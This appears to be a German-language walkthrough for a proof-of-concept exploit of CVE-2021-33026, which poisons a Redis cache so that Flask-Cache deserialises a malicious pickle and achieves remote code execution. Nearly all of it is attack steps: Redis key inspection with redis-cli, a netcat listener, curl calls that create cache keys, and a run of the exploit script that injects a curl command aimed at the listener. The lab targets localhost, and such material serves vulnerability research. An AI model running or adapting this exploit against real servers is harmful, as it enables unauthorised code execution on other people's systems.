
Proof-of-Concept-Exploit für CVE-2021-33026, das Redis-Cache-Vergiftung in Flask-Cache mittels Pickle-Deserialisierung demonstriert, um Remote-Code-Ausführung zu erreichen.
Pickle-Serialisierung Remote-Codeausführung - Redis Poisoning PoC Exploit
Überprüfen, ob der Redis-Server läuft
redis-cli -h 127.0.0.1 -p 6379 ping
redis-cli keys *
redis-cli get [Keyid]
Netcat auf Port 10001 starten und lauschen:
nc -nvlp 10001
Umgebungen für Flask Chache einrichten
python -m venv venv_flask_cache_<lib_ver>
source venv_flask_cache_<lib_ver>\scripts\activate
pip install -r <requirement.txt>
Umgebungen für Flask Chache 2.3.0 einrichten
Flask-App ausführen und Cache-Key erstellen:
flask run
curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new
Cache-Key-Wert von der Flask-App abrufen
curl --request GET http://localhost:5000/cache/[key]
Ausnutzen des Flask-Cache durch Vergiften des Redis-Cache:
cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a